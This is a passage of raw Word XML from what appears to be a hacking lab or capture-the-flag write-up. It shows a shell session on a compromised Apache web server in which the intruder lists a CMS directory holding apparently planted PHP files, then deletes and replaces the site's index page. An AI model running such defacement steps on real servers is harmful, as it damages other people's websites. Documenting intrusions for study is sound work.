        <w:t xml:space="preserve"> data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4DF067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64 Jul 24  2010 docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0C6E04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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>51 Mar 12 13:57 fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE57E0D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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>apache  168962 Mar 12 13:44 fr.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41217018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2255 Jun 20  2010 htaccess.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD62B7A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3263 Jun 20  2010 imsuchaniceguyyoushouldbuymeabeer.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454EAA3B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3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4096 Jul 24  2010 includes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E57B23" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>lrwxrwxrwx  1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> apache ap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">ache  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>15 Mar 12 13:59 index.html -&gt; skyblue/fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB1E885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4727 Jun 20  2010 info.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67322B6D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27 Jul 24  2010 languages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB8F135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27 Jul 24  2010 libs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A3459" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>drwxrwxrwx 25 root   apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">4096 Jul </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">24  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>2010</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> managers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46874014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1997712 Mar 12 13:32 php_errors.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB221F2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5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53 Jul 24  2010 plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CD2338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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>177 Jun 20  2010 robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CD012B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42 Jul 24  2010 rss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B2C90D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6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> roo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">t   apache  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>65 Jul 24  2010 setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD7F047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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>305 Mar 11 13:09 sitemap.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6029DE09" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-rw-rw-r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homer  homer  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>328 Mar 12 12:51 test.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4137DE0E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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>2336 Mar 12 13:32 trace_4711.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E9050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5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45 Jul 24  2010 u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C02FCA4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4096 Jul 24  2010 wym</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A30687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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>338 Mar 12 13:57 xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3E58E9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index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E5C3C1" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>lrwxrwxrwx 1 apache apache 15 Mar 12 13:59 index.html -&gt; skyblue/fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4193862D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>rm index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538F35A0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fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38092DB1" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-rw-r--r-- 1 apache apache 51 Mar 12 13:57 fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532AAEB9" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>ln -s index.php fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277DDDBA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index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AFFF57" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E36D1E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>total 2244</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DE00CD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  35147 Jun 20  2010 COPYING.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D17756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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>8192 Mar 12 13:41 FrogSquad.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDC074C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6379 Jun 20  2010 admin.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7010950C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2788 Mar 11 11:39 base.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4732CE2B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29 Jun 20  2010 build.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031C152D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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>6 Jul 24  2010 cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676512BF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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>328 Mar 12 13:31 cm0.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D1A75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4096 Jul 24  2010 configs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3CC8A7" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>drwxrwxrwx 16 root   apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">4096 Jul </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>24  2010</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EA99D1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64 Jul 24  2010 docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781BB705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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>51 Mar 12 13:57 fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4941B0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 168962 Mar 12 13:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>44 fr.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4769D4FA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2255 Jun 20  2010 htaccess.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C6512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3263 Jun 20  2010 imsuchaniceguyyoushouldbuymeabeer.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565E2CBE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3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4096 Jul 24  2010 includes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E7609E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4727 Jun 20  2010 in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>fo.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4872874E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27 Jul 24  2010 languages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBDA98E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27 Jul 24  2010 libs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431E8DD8" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>drwxrwxrwx 25 root   apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">4096 Jul </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>24  2010</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> managers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0634689F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 1997712 Mar 12 13:32 php_errors.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239E4460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5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> root   ap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">ache  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>53 Jul 24  2010 plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B1DB96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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>177 Jun 20  2010 robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0741D2A0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42 Jul 24  2010 rss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033A0265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6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65 Jul 24  2010 setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637A8DFE" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476"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rwxrwxrwx  1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> root   apache 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305 Mar 11 13:09 sitemap.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA6370B" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-rw-rw-r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homer  homer  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>328 Mar 12 12:51 test.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569A95CF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>--  1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> apache apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>2336 Mar 12 13:32 trace_4711.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037206F0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5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> root   apache  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>45 Jul 24  2010 ui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4880C568" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>drwxrwxrwx  2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> root   apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>4096 Jul 24  2010 wym</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2204AB" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-rw-r--r</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">--  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> apache apache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>338 Mar 12 13:57 xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2719DE74" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>cp fr.html index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2677C2D0" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>ls -l index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7961A7" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-rw-r--r-- 1 apache apache 51 Mar 12 14:01 index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA4376E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="68EF6926" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A1D01D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/var/www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B9C54C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED2C981" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cgi-bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37892BFC" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24693F63" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>polarbearcms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B16E76" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>skyblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E7993B" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>cd html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EE49B8" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408EF727" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AC6ECE" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D23B44C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC88AD3" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>cat index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31827182" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;meta http-equiv="re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>fresh" content="0; url=/skyblue/" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74494C2F" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC9D9D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0837514D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;title&gt;pwned.se - Password-Ned AB&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
